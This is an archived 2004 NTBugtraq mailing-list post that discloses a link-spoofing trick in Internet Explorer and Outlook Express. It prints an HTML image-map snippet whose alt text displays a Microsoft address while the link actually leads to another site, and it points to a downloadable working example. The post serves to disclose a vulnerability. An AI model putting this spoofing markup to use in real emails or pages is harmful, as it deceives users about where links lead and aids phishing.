DEEP SEA PHISHING: Internet Explorer / Outlook Express

http-equiv_at_excite.com
Date: 05/08/04

  • Next message: Russ: "Re: Alert: MS04-015 - corrected URL"
    Date:         Sat, 8 May 2004 21:26:04 -0000
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Saturday, May 08, 2004

    More silliness :

    <A HREF=http://www.microsoft.com alt="http://www.microsoft.com">
    <IMG SRC="malware.gif" USEMAP="#malware" border=0
    alt="http://www.microsoft.com"></A>
    <map NAME="malware" alt="http://www.microsoft.com">>
    <area SHAPE=RECT COORDS="224,21" HREF="http://www.malware.com"
    alt="http://www.microsoft.com">
    </MAP>

    Notes:

    Outlook 2003 has a bubble that correctly identifies it even with
    the alternative text

    Working Example:

    http://www.malware.com/pheeesh.zip

    End Call

    --
    http://www.malware.com
    -----
    Earn up to 10 credit course hours toward the TruSecure ICSA Practitioner (TICSA) Credential and receive a TICSA exam coupon by attending the Infosecurity Canada 2004 conference.  Featured speaker, Marcus J. Ranum, TruSecure inventor of the proxy firewall will present on June 3 at 11:30 AM.  Visit <https://ticsa.trusecure.com>  for certification details and <http://www.infosecuritycanada.com>  for conference information.  Become TICSA certified and see what happens!
    -----
    

  • Next message: Russ: "Re: Alert: MS04-015 - corrected URL"

    Relevant Pages